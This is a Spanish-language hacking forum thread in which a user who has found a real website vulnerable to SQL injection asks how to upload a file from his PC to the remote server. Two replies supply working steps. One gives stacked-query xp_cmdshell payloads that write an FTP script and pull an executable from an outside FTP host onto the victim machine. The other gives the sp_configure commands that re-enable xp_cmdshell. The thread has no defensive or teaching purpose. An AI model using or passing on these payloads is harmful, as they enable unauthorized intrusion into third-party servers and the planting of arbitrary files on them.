Pregunta sobre inyeccion sqlserver.

Iniciado por PHAMTOM, 18 Febrero 2010, 04:07 AM

0 Miembros y 1 Visitante están viendo este tema.

PHAMTOM

Buenas,encontré una pagina vulnerable a sql inyection,SQLSERVER.-

quisiera saber si hay algun metodo , que con la inyeccion subir un archivo de mi pc , al pc remoto vulnerable..

La inyeccion la hago por un formulario..-


Saludos,PHAMTOM
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más

nacho87

En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'


Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.

Saludos!!

Shell Root

Creo que es...
Código (sql) [Seleccionar]
EXEC sp_configure 'show advanced options', 1
RECONFIGURE

EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.